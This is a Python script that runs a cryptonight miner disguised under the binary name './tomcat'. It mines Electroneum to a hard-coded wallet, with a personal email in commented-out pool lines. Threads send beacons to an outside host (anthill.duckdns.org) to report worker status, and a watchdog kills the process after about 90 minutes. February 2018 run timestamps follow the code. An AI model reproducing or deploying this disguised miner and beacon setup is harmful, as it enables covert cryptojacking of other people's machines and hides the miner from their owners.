import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:52:02.076449
#2018-02-17 16:38:06.805464
#2018-02-17 18:26:01.715856
#2018-02-17 20:14:07.210278
#2018-02-17 22:02:01.963020
#2018-02-17 23:46:01.888657
#2018-02-18 01:35:01.659904
#2018-02-18 03:22:01.400085
#2018-02-18 05:10:01.419825
#2018-02-18 07:02:01.908831
#2018-02-18 08:49:05.113448
#2018-02-18 10:36:05.369929
#2018-02-18 12:21:03.108946
#2018-02-18 14:08:03.649036
#2018-02-18 15:58:01.605271
#2018-02-18 17:47:04.000187
#2018-02-18 19:33:03.237504
#2018-02-18 21:18:02.228338
#2018-02-18 23:05:06.979127
#2018-02-19 00:52:04.761463
#2018-02-19 02:39:03.825745
#2018-02-19 04:26:05.652336
#2018-02-19 06:11:05.691606
#2018-02-19 07:58:01.554753
#2018-02-19 09:49:02.154710
#2018-02-19 11:37:03.879931
#2018-02-19 13:24:05.752923
#2018-02-19 15:11:06.976154
#2018-02-19 16:58:02.098879
#2018-02-19 18:44:06.416873
#2018-02-19 20:34:05.649181
#2018-02-19 22:21:04.684802
#2018-02-20 00:07:01.674600
#2018-02-20 01:53:07.675563
#2018-02-20 03:43:08.050837
#2018-02-20 05:28:01.931999
#2018-02-20 07:12:04.563033
#2018-02-20 08:58:01.949197
#2018-02-20 10:41:05.844774
#2018-02-20 12:26:10.156324
#2018-02-20 14:13:06.756469
#2018-02-20 15:57:05.055593
#2018-02-20 17:43:09.052656
#2018-02-20 19:32:01.965890
#2018-02-20 21:19:07.856934
#2018-02-20 23:03:07.071176
#2018-02-21 00:48:02.008921
#2018-02-21 02:33:03.844481
#2018-02-21 04:21:06.029249
#2018-02-21 06:07:05.790005
#2018-02-21 07:53:07.236241
#2018-02-21 09:40:03.944823
#2018-02-21 11:28:06.661956
#2018-02-21 13:17:07.941814
#2018-02-21 15:03:07.106253
#2018-02-21 16:53:07.073507
#2018-02-21 18:44:04.143176
#2018-02-21 20:32:05.040775
#2018-02-21 22:18:02.196181
#2018-02-22 00:07:04.774076
#2018-02-22 01:55:10.740352
#2018-02-22 03:42:05.878027
#2018-02-22 05:28:05.941186
#2018-02-22 07:13:05.788539
#2018-02-22 08:59:06.520379
#2018-02-22 10:48:02.100084
#2018-02-22 12:34:05.778281
#2018-02-22 14:18:09.205387
#2018-02-22 16:07:06.033973
#2018-02-22 17:52:12.656781
#2018-02-22 19:39:09.157032
#2018-02-22 21:30:07.163795
#2018-02-22 23:16:06.277182
#2018-02-23 01:02:07.638981
#2018-02-23 02:50:08.579994
#2018-02-23 04:40:02.007335
#2018-02-23 06:26:04.172330
#2018-02-23 08:13:08.059254
#2018-02-23 10:29:01.702806
#2018-02-23 12:22:01.657494
#2018-02-23 14:10:11.767729
#2018-02-23 16:01:08.312879
#2018-02-23 17:46:07.352088
#2018-02-23 19:34:02.036907
#2018-02-23 21:17:03.788237
#2018-02-23 23:04:05.048220
#2018-02-24 00:49:06.397758
#2018-02-24 02:43:03.302078
#2018-02-24 04:37:03.855858
#2018-02-24 06:22:04.230147
#2018-02-24 08:09:06.456221
#2018-02-24 09:54:01.907366
#2018-02-24 11:48:05.116257
#2018-02-24 13:39:01.348830
#2018-02-24 15:26:07.773182
#2018-02-24 17:16:04.870716
#2018-02-24 19:07:03.890034
#2018-02-24 20:55:02.123921
#2018-02-24 23:20:08.481557
#2018-02-25 03:22:01.328528
#2018-02-25 06:46:07.302330